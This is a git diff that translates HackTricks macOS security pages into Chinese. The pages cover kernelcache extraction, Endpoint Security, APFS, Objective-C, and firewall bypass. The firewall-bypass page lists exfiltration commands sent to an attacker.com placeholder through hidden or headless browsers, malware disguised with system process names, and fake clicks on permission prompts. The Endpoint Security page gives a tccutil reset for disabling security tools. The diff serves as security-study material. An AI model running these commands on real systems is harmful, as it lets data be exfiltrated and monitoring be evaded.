**有效载荷 (IM4P)**: +- 通常被压缩(LZFSE4, LZSS, …) +- 可选加密 +- **清单 (IM4M)**: +- 包含签名 +- 额外的键/值字典 +- **恢复信息 (IM4R)**: +- 也称为 APNonce +- 防止某些更新的重放 +- 可选:通常不会找到 +解压 Kernelcache: ```bash # img4tool (https://github.com/tihmstar/img4tool img4tool -e kernelcache.release.iphone14 -o kernelcache.release.iphone14.e @@ -84,49 +81,39 @@ img4tool -e kernelcache.release.iphone14 -o kernelcache.release.iphone14.e # pyimg4 (https://github.com/m1stadev/PyIMG4) pyimg4 im4p extract -i kernelcache.release.iphone14 -o kernelcache.release.iphone14.e ``` - -### Download +### 下载 - [**KernelDebugKit Github**](https://github.com/dortania/KdkSupportPkg/releases) -In [https://github.com/dortania/KdkSupportPkg/releases](https://github.com/dortania/KdkSupportPkg/releases) it's possible to find all the kernel debug kits. You can download it, mount it, open it with [Suspicious Package](https://www.mothersruin.com/software/SuspiciousPackage/get.html) tool, access the **`.kext`** folder and **extract it**. - -Check it for symbols with: +在 [https://github.com/dortania/KdkSupportPkg/releases](https://github.com/dortania/KdkSupportPkg/releases) 可以找到所有的内核调试工具包。你可以下载它,挂载它,用 [Suspicious Package](https://www.mothersruin.com/software/SuspiciousPackage/get.html) 工具打开它,访问 **`.kext`** 文件夹并 **提取它**。 +使用以下命令检查符号: ```bash nm -a ~/Downloads/Sandbox.kext/Contents/MacOS/Sandbox | wc -l ``` - - [**theapplewiki.com**](https://theapplewiki.com/wiki/Firmware/Mac/14.x)**,** [**ipsw.me**](https://ipsw.me/)**,** [**theiphonewiki.com**](https://www.theiphonewiki.com/) -Sometime Apple releases **kernelcache** with **symbols**. You can download some firmwares with symbols by following links on those pages. The firmwares will contain the **kernelcache** among other files. +有时,Apple 会发布带有 **symbols** 的 **kernelcache**。您可以通过这些页面上的链接下载一些带有符号的固件。固件将包含 **kernelcache** 以及其他文件。 -To **extract** the files start by changing the extension from `.ipsw` to `.zip` and **unzip** it. +要 **extract** 文件,首先将扩展名从 `.ipsw` 更改为 `.zip` 并 **unzip** 它。 -After extracting the firmware you will get a file like: **`kernelcache.release.iphone14`**. It's in **IMG4** format, you can extract the interesting info with: +提取固件后,您将获得一个文件,如:**`kernelcache.release.iphone14`**。它是 **IMG4** 格式,您可以使用以下工具提取有趣的信息: [**pyimg4**](https://github.com/m1stadev/PyIMG4)**:** - ```bash pyimg4 im4p extract -i kernelcache.release.iphone14 -o kernelcache.release.iphone14.e ``` - -[**img4tool**](https://github.com/tihmstar/img4tool)**:** - +[**img4tool**](https://github.com/tihmstar/img4tool)**:** ```bash img4tool -e kernelcache.release.iphone14 -o kernelcache.release.iphone14.e ``` +### 检查 kernelcache -### Inspecting kernelcache - -Check if the kernelcache has symbols with - +检查 kernelcache 是否具有符号。 ```bash nm -a kernelcache.release.iphone14.e | wc -l ``` - -With this we can now **extract all the extensions** or the **one you are interested in:** - +通过这个,我们现在可以**提取所有扩展**或**您感兴趣的扩展:** ```bash # List all extensions kextex -l kernelcache.release.iphone14.e @@ -139,10 +126,9 @@ kextex_all kernelcache.release.iphone14.e # Check the extension for symbols nm -a binaries/com.apple.security.sandbox | wc -l ``` +## 调试 -## Debugging - -## Referencias +## 参考文献 - [https://www.makeuseof.com/how-to-enable-third-party-kernel-extensions-apple-silicon-mac/](https://www.makeuseof.com/how-to-enable-third-party-kernel-extensions-apple-silicon-mac/) - [https://www.youtube.com/watch?v=hGKOskSiaQo](https://www.youtube.com/watch?v=hGKOskSiaQo) diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-kernel-vulnerabilities.md b/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-kernel-vulnerabilities.md index bb6bb0697..f58fb50d6 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-kernel-vulnerabilities.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-kernel-vulnerabilities.md @@ -1,10 +1,10 @@ -# macOS Kernel Vulnerabilities +# macOS 内核漏洞 {{#include ../../../banners/hacktricks-training.md}} ## [Pwning OTA](https://jhftss.github.io/The-Nightmare-of-Apple-OTA-Update/) -[**In this report**](https://jhftss.github.io/The-Nightmare-of-Apple-OTA-Update/) are explained several vulnerabilities that allowed to compromised the kernel compromising the software updater.\ +[**在本报告中**](https://jhftss.github.io/The-Nightmare-of-Apple-OTA-Update/) 解释了几个漏洞,这些漏洞允许通过软件更新程序来破坏内核。\ [**PoC**](https://github.com/jhftss/POC/tree/main/CVE-2022-46722). {{#include ../../../banners/hacktricks-training.md}} diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-system-extensions.md b/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-system-extensions.md index 83bdf0dc2..67b1cb19c 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-system-extensions.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-system-extensions.md @@ -1,81 +1,79 @@ -# macOS System Extensions +# macOS 系统扩展 {{#include ../../../banners/hacktricks-training.md}} -## System Extensions / Endpoint Security Framework +## 系统扩展 / 端点安全框架 -Unlike Kernel Extensions, **System Extensions run in user space** instead of kernel space, reducing the risk of a system crash due to extension malfunction. +与内核扩展不同,**系统扩展在用户空间中运行**,而不是内核空间,从而降低了由于扩展故障导致系统崩溃的风险。
https://knight.sc/images/system-extension-internals-1.png
-There are three types of system extensions: **DriverKit** Extensions, **Network** Extensions, and **Endpoint Security** Extensions. +系统扩展有三种类型:**DriverKit** 扩展、**网络** 扩展和 **端点安全** 扩展。 -### **DriverKit Extensions** +### **DriverKit 扩展** -DriverKit is a replacement for kernel extensions that **provide hardware support**. It allows device drivers (like USB, Serial, NIC, and HID drivers) to run in user space rather than kernel space. The DriverKit framework includes **user space versions of certain I/O Kit classes**, and the kernel forwards normal I/O Kit events to user space, offering a safer environment for these drivers to run. +DriverKit 是内核扩展的替代品,**提供硬件支持**。它允许设备驱动程序(如 USB、串行、NIC 和 HID 驱动程序)在用户空间中运行,而不是内核空间。DriverKit 框架包括 **某些 I/O Kit 类的用户空间版本**,内核将正常的 I/O Kit 事件转发到用户空间,为这些驱动程序提供了一个更安全的运行环境。 -### **Network Extensions** +### **网络扩展** -Network Extensions provide the ability to customize network behaviors. There are several types of Network Extensions: +网络扩展提供了自定义网络行为的能力。网络扩展有几种类型: -- **App Proxy**: This is used for creating a VPN client that implements a flow-oriented, custom VPN protocol. This means it handles network traffic based on connections (or flows) rather than individual packets. -- **Packet Tunnel**: This is used for creating a VPN client that implements a packet-oriented, custom VPN protocol. This means it handles network traffic based on individual packets. -- **Filter Data**: This is used for filtering network "flows". It can monitor or modify network data at the flow level. -- **Filter Packet**: This is used for filtering individual network packets. It can monitor or modify network data at the packet level. -- **DNS Proxy**: This is used for creating a custom DNS provider. It can be used to monitor or modify DNS requests and responses. +- **应用代理**:用于创建实现流式定制 VPN 协议的 VPN 客户端。这意味着它根据连接(或流)而不是单个数据包处理网络流量。 +- **数据包隧道**:用于创建实现数据包导向定制 VPN 协议的 VPN 客户端。这意味着它根据单个数据包处理网络流量。 +- **过滤数据**:用于过滤网络“流”。它可以在流级别监控或修改网络数据。 +- **过滤数据包**:用于过滤单个网络数据包。它可以在数据包级别监控或修改网络数据。 +- **DNS 代理**:用于创建自定义 DNS 提供程序。它可以用于监控或修改 DNS 请求和响应。 -## Endpoint Security Framework +## 端点安全框架 -Endpoint Security is a framework provided by Apple in macOS that provides a set of APIs for system security. It's intended for use by **security vendors and developers to build products that can monitor and control system activity** to identify and protect against malicious activity. +端点安全是 Apple 在 macOS 中提供的一个框架,提供了一组用于系统安全的 API。它旨在供 **安全供应商和开发人员构建能够监控和控制系统活动** 的产品,以识别和防止恶意活动。 -This framework provides a **collection of APIs to monitor and control system activity**, such as process executions, file system events, network and kernel events. +该框架提供了一组 **监控和控制系统活动的 API**,例如进程执行、文件系统事件、网络和内核事件。 -The core of this framework is implemented in the kernel, as a Kernel Extension (KEXT) located at **`/System/Library/Extensions/EndpointSecurity.kext`**. This KEXT is made up of several key components: +该框架的核心在内核中实现,作为位于 **`/System/Library/Extensions/EndpointSecurity.kext`** 的内核扩展(KEXT)。该 KEXT 由几个关键组件组成: -- **EndpointSecurityDriver**: This acts as the "entry point" for the kernel extension. It's the main point of interaction between the OS and the Endpoint Security framework. -- **EndpointSecurityEventManager**: This component is responsible for implementing kernel hooks. Kernel hooks allow the framework to monitor system events by intercepting system calls. -- **EndpointSecurityClientManager**: This manages the communication with user space clients, keeping track of which clients are connected and need to receive event notifications. -- **EndpointSecurityMessageManager**: This sends messages and event notifications to user space clients. +- **EndpointSecurityDriver**:作为内核扩展的“入口点”。它是操作系统与端点安全框架之间的主要交互点。 +- **EndpointSecurityEventManager**:该组件负责实现内核钩子。内核钩子允许框架通过拦截系统调用来监控系统事件。 +- **EndpointSecurityClientManager**:管理与用户空间客户端的通信,跟踪哪些客户端已连接并需要接收事件通知。 +- **EndpointSecurityMessageManager**:向用户空间客户端发送消息和事件通知。 -The events that the Endpoint Security framework can monitor are categorized into: +端点安全框架可以监控的事件分为: -- File events -- Process events -- Socket events -- Kernel events (such as loading/unloading a kernel extension or opening an I/O Kit device) +- 文件事件 +- 进程事件 +- 套接字事件 +- 内核事件(例如加载/卸载内核扩展或打开 I/O Kit 设备) -### Endpoint Security Framework Architecture +### 端点安全框架架构
https://www.youtube.com/watch?v=jaVkpM1UqOs
-**User-space communication** with the Endpoint Security framework happens through the IOUserClient class. Two different subclasses are used, depending on the type of caller: +与端点安全框架的 **用户空间通信** 通过 IOUserClient 类进行。根据调用者的类型使用两种不同的子类: -- **EndpointSecurityDriverClient**: This requires the `com.apple.private.endpoint-security.manager` entitlement, which is only held by the system process `endpointsecurityd`. -- **EndpointSecurityExternalClient**: This requires the `com.apple.developer.endpoint-security.client` entitlement. This would typically be used by third-party security software that needs to interact with the Endpoint Security framework. +- **EndpointSecurityDriverClient**:这需要 `com.apple.private.endpoint-security.manager` 权限,仅由系统进程 `endpointsecurityd` 持有。 +- **EndpointSecurityExternalClient**:这需要 `com.apple.developer.endpoint-security.client` 权限。通常由需要与端点安全框架交互的第三方安全软件使用。 -The Endpoint Security Extensions:**`libEndpointSecurity.dylib`** is the C library that system extensions use to communicate with the kernel. This library uses the I/O Kit (`IOKit`) to communicate with the Endpoint Security KEXT. +端点安全扩展:**`libEndpointSecurity.dylib`** 是系统扩展用于与内核通信的 C 库。该库使用 I/O Kit (`IOKit`) 与端点安全 KEXT 进行通信。 -**`endpointsecurityd`** is a key system daemon involved in managing and launching endpoint security system extensions, particularly during the early boot process. **Only system extensions** marked with **`NSEndpointSecurityEarlyBoot`** in their `Info.plist` file receive this early boot treatment. +**`endpointsecurityd`** 是一个关键的系统守护进程,负责管理和启动端点安全系统扩展,特别是在早期启动过程中。**只有标记为** **`NSEndpointSecurityEarlyBoot`** **的系统扩展** 在其 `Info.plist` 文件中接收这种早期启动处理。 -Another system daemon, **`sysextd`**, **validates system extensions** and moves them into the proper system locations. It then asks the relevant daemon to load the extension. The **`SystemExtensions.framework`** is responsible for activating and deactivating system extensions. +另一个系统守护进程 **`sysextd`** **验证系统扩展** 并将其移动到适当的系统位置。然后,它请求相关守护进程加载扩展。**`SystemExtensions.framework`** 负责激活和停用系统扩展。 -## Bypassing ESF +## 绕过 ESF -ESF is used by security tools that will try to detect a red teamer, so any information about how this could be avoided sounds interesting. +ESF 被安全工具使用,这些工具会尝试检测红队,因此任何关于如何避免这一点的信息都很有趣。 ### CVE-2021-30965 -The thing is that the security application needs to have **Full Disk Access permissions**. So if an attacker could remove that, he could prevent the software from running: - +问题在于安全应用程序需要具有 **完全磁盘访问权限**。因此,如果攻击者能够移除该权限,他可以阻止软件运行: ```bash tccutil reset All ``` +有关此绕过及相关内容的**更多信息**,请查看演讲 [#OBTS v5.0: "The Achilles Heel of EndpointSecurity" - Fitzl Csaba](https://www.youtube.com/watch?v=lQO7tvNCoTI) -For **more information** about this bypass and related ones check the talk [#OBTS v5.0: "The Achilles Heel of EndpointSecurity" - Fitzl Csaba](https://www.youtube.com/watch?v=lQO7tvNCoTI) +最终,通过将新的权限 **`kTCCServiceEndpointSecurityClient`** 授予由 **`tccd`** 管理的安全应用程序来修复此问题,因此 `tccutil` 不会清除其权限,从而防止其运行。 -At the end this was fixed by giving the new permission **`kTCCServiceEndpointSecurityClient`** to the security app managed by **`tccd`** so `tccutil` won't clear its permissions preventing it from running. - -## References +## 参考文献 - [**OBTS v3.0: "Endpoint Security & Insecurity" - Scott Knight**](https://www.youtube.com/watch?v=jaVkpM1UqOs) - [**https://knight.sc/reverse%20engineering/2019/08/24/system-extension-internals.html**](https://knight.sc/reverse%20engineering/2019/08/24/system-extension-internals.html) diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-applefs.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-applefs.md index 7e9bb6e6d..b2ca5de86 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-applefs.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-applefs.md @@ -2,33 +2,29 @@ {{#include ../../banners/hacktricks-training.md}} -## Apple Propietary File System (APFS) +## Apple 专有文件系统 (APFS) -**Apple File System (APFS)** is a modern file system designed to supersede the Hierarchical File System Plus (HFS+). Its development was driven by the need for **improved performance, security, and efficiency**. +**Apple 文件系统 (APFS)** 是一种现代文件系统,旨在取代层次文件系统 Plus (HFS+)。其开发是为了满足 **提高性能、安全性和效率** 的需求。 -Some notable features of APFS include: +APFS 的一些显著特点包括: -1. **Space Sharing**: APFS allows multiple volumes to **share the same underlying free storage** on a single physical device. This enables more efficient space utilization as the volumes can dynamically grow and shrink without the need for manual resizing or repartitioning. - 1. This means, compared with traditional partitions in file disks, **that in APFS different partitions (volumes) shares all the disk space**, while a regular partition usually had a fixed size. -2. **Snapshots**: APFS supports **creating snapshots**, which are **read-only**, point-in-time instances of the file system. Snapshots enable efficient backups and easy system rollbacks, as they consume minimal additional storage and can be quickly created or reverted. -3. **Clones**: APFS can **create file or directory clones that share the same storage** as the original until either the clone or the original file is modified. This feature provides an efficient way to create copies of files or directories without duplicating the storage space. -4. **Encryption**: APFS **natively supports full-disk encryption** as well as per-file and per-directory encryption, enhancing data security across different use cases. -5. **Crash Protection**: APFS uses a **copy-on-write metadata scheme that ensures file system consistency** even in cases of sudden power loss or system crashes, reducing the risk of data corruption. - -Overall, APFS offers a more modern, flexible, and efficient file system for Apple devices, with a focus on improved performance, reliability, and security. +1. **空间共享**:APFS 允许多个卷 **共享同一物理设备上的底层可用存储**。这使得空间利用更加高效,因为卷可以动态增长和缩小,而无需手动调整大小或重新分区。 +1. 这意味着,与传统的文件磁盘分区相比,**在 APFS 中,不同的分区(卷)共享所有磁盘空间**,而常规分区通常具有固定大小。 +2. **快照**:APFS 支持 **创建快照**,这些快照是 **只读的**、时间点实例的文件系统。快照使得高效备份和轻松系统回滚成为可能,因为它们消耗的额外存储极少,并且可以快速创建或恢复。 +3. **克隆**:APFS 可以 **创建文件或目录克隆,这些克隆与原始文件共享相同的存储**,直到克隆或原始文件被修改。此功能提供了一种高效的方式来创建文件或目录的副本,而无需重复存储空间。 +4. **加密**:APFS **原生支持全盘加密**以及逐文件和逐目录加密,增强了不同使用场景下的数据安全性。 +5. **崩溃保护**:APFS 使用 **写时复制元数据方案,确保文件系统的一致性**,即使在突然断电或系统崩溃的情况下,也能减少数据损坏的风险。 +总体而言,APFS 为 Apple 设备提供了一种更现代、更灵活和更高效的文件系统,重点在于提高性能、可靠性和安全性。 ```bash diskutil list # Get overview of the APFS volumes ``` - ## Firmlinks -The `Data` volume is mounted in **`/System/Volumes/Data`** (you can check this with `diskutil apfs list`). - -The list of firmlinks can be found in the **`/usr/share/firmlinks`** file. +`Data` 卷挂载在 **`/System/Volumes/Data`**(您可以使用 `diskutil apfs list` 检查这一点)。 +firmlinks 的列表可以在 **`/usr/share/firmlinks`** 文件中找到。 ```bash ``` - {{#include ../../banners/hacktricks-training.md}} diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-basic-objective-c.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-basic-objective-c.md index 4561700b5..4cc27f7f9 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-basic-objective-c.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-basic-objective-c.md @@ -5,24 +5,21 @@ ## Objective-C > [!CAUTION] -> Note that programs written in Objective-C **retain** their class declarations **when** **compiled** into [Mach-O binaries](macos-files-folders-and-binaries/universal-binaries-and-mach-o-format.md). Such class declarations **include** the name and type of: +> 请注意,用 Objective-C 编写的程序在编译成 [Mach-O binaries](macos-files-folders-and-binaries/universal-binaries-and-mach-o-format.md) 时 **保留** 其类声明。这些类声明 **包括** 的信息有: -- The class -- The class methods -- The class instance variables - -You can get this information using [**class-dump**](https://github.com/nygard/class-dump): +- 类名 +- 类方法 +- 类实例变量 +您可以使用 [**class-dump**](https://github.com/nygard/class-dump) 获取这些信息: ```bash class-dump Kindle.app ``` +请注意,这些名称可能会被混淆,以使二进制文件的逆向工程更加困难。 -Note that this names could be obfuscated to make the reversing of the binary more difficult. - -## Classes, Methods & Objects - -### Interface, Properties & Methods +## 类、方法和对象 +### 接口、属性和方法 ```objectivec // Declare the interface of the class @interface MyVehicle : NSObject @@ -37,29 +34,25 @@ Note that this names could be obfuscated to make the reversing of the binary mor @end ``` - -### **Class** - +### **类** ```objectivec @implementation MyVehicle : NSObject // No need to indicate the properties, only define methods - (void)startEngine { - NSLog(@"Engine started"); +NSLog(@"Engine started"); } - (void)addWheels:(int)value { - self.numberOfWheels += value; +self.numberOfWheels += value; } @end ``` +### **对象与调用方法** -### **Object & Call Method** - -To create an instance of a class the **`alloc`** method is called which **allocate memory** for each **property** and **zero** those allocations. Then **`init`** is called, which **initilize the properties** to the **required values**. - +要创建一个类的实例,调用 **`alloc`** 方法,该方法 **为每个属性分配内存** 并 **将这些分配置为零**。然后调用 **`init`**,该方法 **将属性初始化为所需的值**。 ```objectivec // Something like this: MyVehicle *newVehicle = [[MyVehicle alloc] init]; @@ -71,19 +64,15 @@ MyVehicle *newVehicle = [MyVehicle new]; // [myClassInstance nameOfTheMethodFirstParam:param1 secondParam:param2] [newVehicle addWheels:4]; ``` +### **类方法** -### **Class Methods** - -Class methods are defined with the **plus sign** (+) not the hyphen (-) that is used with instance methods. Like the **NSString** class method **`stringWithString`**: - +类方法是用 **加号** (+) 定义的,而不是用于实例方法的连字符 (-)。例如 **NSString** 类方法 **`stringWithString`**: ```objectivec + (id)stringWithString:(NSString *)aString; ``` - ### Setter & Getter -To **set** & **get** properties, you could do it with a **dot notation** or like if you were **calling a method**: - +要**设置**和**获取**属性,您可以使用**点表示法**或像**调用方法**一样: ```objectivec // Set newVehicle.numberOfWheels = 2; @@ -93,24 +82,20 @@ newVehicle.numberOfWheels = 2; NSLog(@"Number of wheels: %i", newVehicle.numberOfWheels); NSLog(@"Number of wheels: %i", [newVehicle numberOfWheels]); ``` +### **实例变量** -### **Instance Variables** - -Alternatively to setter & getter methods you can use instance variables. These variables have the same name as the properties but starting with a "\_": - +除了 setter 和 getter 方法,你可以使用实例变量。这些变量与属性同名,但以 "_" 开头: ```objectivec - (void)makeLongTruck { - _numberOfWheels = +10000; - NSLog(@"Number of wheels: %i", self.numberOfLeaves); +_numberOfWheels = +10000; +NSLog(@"Number of wheels: %i", self.numberOfLeaves); } ``` +### 协议 -### Protocols - -Protocols are set of method declarations (without properties). A class that implements a protocol implement the declared methods. - -There are 2 types of methods: **mandatory** and **optional**. By **default** a method is **mandatory** (but you can also indicate it with a **`@required`** tag). To indicate that a method is optional use **`@optional`**. +协议是一组方法声明(没有属性)。实现协议的类实现声明的方法。 +方法有两种类型:**必需**和**可选**。默认情况下,方法是**必需**的(但您也可以使用**`@required`**标签来指示)。要指示方法是可选的,请使用**`@optional`**。 ```objectivec @protocol myNewProtocol - (void) method1; //mandatory @@ -120,9 +105,7 @@ There are 2 types of methods: **mandatory** and **optional**. By **default** a m - (void) method3; //optional @end ``` - -### All together - +### 一起 ```objectivec // gcc -framework Foundation test_obj.m -o test_obj #import @@ -148,50 +131,44 @@ There are 2 types of methods: **mandatory** and **optional**. By **default** a m @implementation MyVehicle : NSObject - (void)startEngine { - NSLog(@"Engine started"); +NSLog(@"Engine started"); } - (void)addWheels:(int)value { - self.numberOfWheels += value; +self.numberOfWheels += value; } - (void)makeLongTruck { - _numberOfWheels = +10000; - NSLog(@"Number of wheels: %i", self.numberOfWheels); +_numberOfWheels = +10000; +NSLog(@"Number of wheels: %i", self.numberOfWheels); } @end int main() { - MyVehicle* mySuperCar = [MyVehicle new]; - [mySuperCar startEngine]; - mySuperCar.numberOfWheels = 4; - NSLog(@"Number of wheels: %i", mySuperCar.numberOfWheels); - [mySuperCar setNumberOfWheels:3]; - NSLog(@"Number of wheels: %i", mySuperCar.numberOfWheels); - [mySuperCar makeLongTruck]; +MyVehicle* mySuperCar = [MyVehicle new]; +[mySuperCar startEngine]; +mySuperCar.numberOfWheels = 4; +NSLog(@"Number of wheels: %i", mySuperCar.numberOfWheels); +[mySuperCar setNumberOfWheels:3]; +NSLog(@"Number of wheels: %i", mySuperCar.numberOfWheels); +[mySuperCar makeLongTruck]; } ``` +### 基本类 -### Basic Classes - -#### String - +#### 字符串 ```objectivec // NSString NSString *bookTitle = @"The Catcher in the Rye"; NSString *bookAuthor = [[NSString alloc] initWithCString:"J.D. Salinger" encoding:NSUTF8StringEncoding]; NSString *bookPublicationYear = [NSString stringWithCString:"1951" encoding:NSUTF8StringEncoding]; ``` - -Basic classes are **immutable**, so to append a string to an existing one a **new NSString needs to be created**. - +基本类是**不可变的**,因此要将一个字符串附加到现有字符串上,**需要创建一个新的 NSString**。 ```objectivec NSString *bookDescription = [NSString stringWithFormat:@"%@ by %@ was published in %@", bookTitle, bookAuthor, bookPublicationYear]; ``` - -Or you could also use a **mutable** string class: - +或者你也可以使用一个**可变**字符串类: ```objectivec NSMutableString *mutableString = [NSMutableString stringWithString:@"The book "]; [mutableString appendString:bookTitle]; @@ -200,9 +177,7 @@ NSMutableString *mutableString = [NSMutableString stringWithString:@"The book "] [mutableString appendString:@" and published in "]; [mutableString appendString:bookPublicationYear]; ``` - -#### Number - +#### 数字 ```objectivec // character literals. NSNumber *theLetterZ = @'Z'; // equivalent to [NSNumber numberWithChar:'Z'] @@ -221,9 +196,7 @@ NSNumber *piDouble = @3.1415926535; // equivalent to [NSNumber numberWithDouble: NSNumber *yesNumber = @YES; // equivalent to [NSNumber numberWithBool:YES] NSNumber *noNumber = @NO; // equivalent to [NSNumber numberWithBool:NO] ``` - -#### Array, Sets & Dictionary - +#### 数组、集合和字典 ```objectivec // Inmutable arrays NSArray *colorsArray1 = [NSArray arrayWithObjects:@"red", @"green", @"blue", nil]; @@ -250,18 +223,18 @@ NSMutableSet *mutFruitsSet = [NSMutableSet setWithObjects:@"apple", @"banana", @ // Dictionary NSDictionary *fruitColorsDictionary = @{ - @"apple" : @"red", - @"banana" : @"yellow", - @"orange" : @"orange", - @"grape" : @"purple" +@"apple" : @"red", +@"banana" : @"yellow", +@"orange" : @"orange", +@"grape" : @"purple" }; // In dictionaryWithObjectsAndKeys you specify the value and then the key: NSDictionary *fruitColorsDictionary2 = [NSDictionary dictionaryWithObjectsAndKeys: - @"red", @"apple", - @"yellow", @"banana", - @"orange", @"orange", - @"purple", @"grape", +@"red", @"apple", +@"yellow", @"banana", +@"orange", @"orange", +@"purple", @"grape", nil]; // Mutable dictionary @@ -269,80 +242,71 @@ NSMutableDictionary *mutFruitColorsDictionary = [NSMutableDictionary dictionaryW [mutFruitColorsDictionary setObject:@"green" forKey:@"apple"]; [mutFruitColorsDictionary removeObjectForKey:@"grape"]; ``` - ### Blocks -Blocks are **functions that behaves as objects** so they can be passed to functions or **stored** in **arrays** or **dictionaries**. Also, they can **represent a value if they are given values** so it's similar to lambdas. - +Blocks 是 **作为对象行为的函数**,因此可以传递给函数或 **存储** 在 **数组** 或 **字典** 中。此外,如果给定值,它们可以 **表示一个值**,因此类似于 lambdas。 ```objectivec returnType (^blockName)(argumentType1, argumentType2, ...) = ^(argumentType1 param1, argumentType2 param2, ...){ - //Perform operations here +//Perform operations here }; // For example int (^suma)(int, int) = ^(int a, int b){ - return a+b; +return a+b; }; NSLog(@"3+4 = %d", suma(3,4)); ``` - -It's also possible to **define a block type to be used as a parameter** in functions: - +也可以**定义一个块类型作为函数中的参数**: ```objectivec // Define the block type typedef void (^callbackLogger)(void); // Create a bloack with the block type callbackLogger myLogger = ^{ - NSLog(@"%@", @"This is my block"); +NSLog(@"%@", @"This is my block"); }; // Use it inside a function as a param void genericLogger(callbackLogger blockParam) { - NSLog(@"%@", @"This is my function"); - blockParam(); +NSLog(@"%@", @"This is my function"); +blockParam(); } genericLogger(myLogger); // Call it inline genericLogger(^{ - NSLog(@"%@", @"This is my second block"); +NSLog(@"%@", @"This is my second block"); }); ``` - -### Files - +### 文件 ```objectivec // Manager to manage files NSFileManager *fileManager = [NSFileManager defaultManager]; // Check if file exists: if ([fileManager fileExistsAtPath:@"/path/to/file.txt" ] == YES) { - NSLog (@"File exists"); +NSLog (@"File exists"); } // copy files if ([fileManager copyItemAtPath: @"/path/to/file1.txt" toPath: @"/path/to/file2.txt" error:nil] == YES) { - NSLog (@"Copy successful"); +NSLog (@"Copy successful"); } // Check if the content of 2 files match if ([fileManager contentsEqualAtPath:@"/path/to/file1.txt" andPath:@"/path/to/file2.txt"] == YES) { - NSLog (@"File contents match"); +NSLog (@"File contents match"); } // Delete file if ([fileManager removeItemAtPath:@"/path/to/file1.txt" error:nil]) { - NSLog(@"Removed successfully"); +NSLog(@"Removed successfully"); } ``` - -It's also possible to manage files **using `NSURL` objects instead of `NSString`** objects. The method names are similar, but **with `URL` instead of `Path`**. - +也可以使用 **`NSURL` 对象而不是 `NSString` 对象** 来管理文件。方法名称类似,但 **使用 `URL` 而不是 `Path`**。 ```objectivec ``` - {{#include ../../banners/hacktricks-training.md}} diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-bypassing-firewalls.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-bypassing-firewalls.md index 7d376dfe5..9524153b3 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-bypassing-firewalls.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-bypassing-firewalls.md @@ -1,85 +1,75 @@ -# macOS Bypassing Firewalls +# macOS 绕过防火墙 {{#include ../../banners/hacktricks-training.md}} -## Found techniques +## 发现的技术 -The following techniques were found working in some macOS firewall apps. +以下技术在某些 macOS 防火墙应用中有效。 -### Abusing whitelist names +### 滥用白名单名称 -- For example calling the malware with names of well known macOS processes like **`launchd`** +- 例如使用 **`launchd`** 等知名 macOS 进程的名称来调用恶意软件 -### Synthetic Click +### 合成点击 -- If the firewall ask for permission to the user make the malware **click on allow** +- 如果防火墙要求用户授权,让恶意软件 **点击允许** -### **Use Apple signed binaries** +### **使用苹果签名的二进制文件** -- Like **`curl`**, but also others like **`whois`** +- 像 **`curl`**,还有其他如 **`whois`** -### Well known apple domains +### 知名苹果域名 -The firewall could be allowing connections to well known apple domains such as **`apple.com`** or **`icloud.com`**. And iCloud could be used as a C2. +防火墙可能允许连接到知名的苹果域名,如 **`apple.com`** 或 **`icloud.com`**。iCloud 可以用作 C2。 -### Generic Bypass +### 通用绕过 -Some ideas to try to bypass firewalls +一些尝试绕过防火墙的想法 -### Check allowed traffic - -Knowing the allowed traffic will help you identify potentially whitelisted domains or which applications are allowed to access them +### 检查允许的流量 +了解允许的流量将帮助您识别潜在的白名单域名或哪些应用程序被允许访问它们 ```bash lsof -i TCP -sTCP:ESTABLISHED ``` +### 滥用 DNS -### Abusing DNS - -DNS resolutions are done via **`mdnsreponder`** signed application which will probably vi allowed to contact DNS servers. +DNS 解析是通过 **`mdnsreponder`** 签名应用程序完成的,该应用程序可能被允许联系 DNS 服务器。
https://www.youtube.com/watch?v=UlT5KFTMn2k
-### Via Browser apps +### 通过浏览器应用程序 - **oascript** - ```applescript tell application "Safari" - run - tell application "Finder" to set visible of process "Safari" to false - make new document - set the URL of document 1 to "https://attacker.com?data=data%20to%20exfil +run +tell application "Finder" to set visible of process "Safari" to false +make new document +set the URL of document 1 to "https://attacker.com?data=data%20to%20exfil end tell ``` - -- Google Chrome - +- 谷歌浏览器 ```bash "Google Chrome" --crash-dumps-dir=/tmp --headless "https://attacker.com?data=data%20to%20exfil" ``` - -- Firefox - +- 火狐浏览器 ```bash firefox-bin --headless "https://attacker.com?data=data%20to%20exfil" ``` - - Safari - ```bash open -j -a Safari "https://attacker.com?data=data%20to%20exfil" ``` +### 通过进程注入 -### Via processes injections - -If you can **inject code into a process** that is allowed to connect to any server you could bypass the firewall protections: +如果你可以**将代码注入到一个被允许连接到任何服务器的进程中**,你就可以绕过防火墙保护: {{#ref}} macos-proces-abuse/ {{#endref}} -## References +## 参考 - [https://www.youtube.com/watch?v=UlT5KFTMn2k](https://www.youtube.com/watch?v=UlT5KFTMn2k) diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-defensive-apps.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-defensive-apps.md index a41d941e4..b95e96165 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-defensive-apps.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-defensive-apps.md @@ -1,19 +1,19 @@ -# macOS Defensive Apps +# macOS 防御应用 {{#include ../../banners/hacktricks-training.md}} 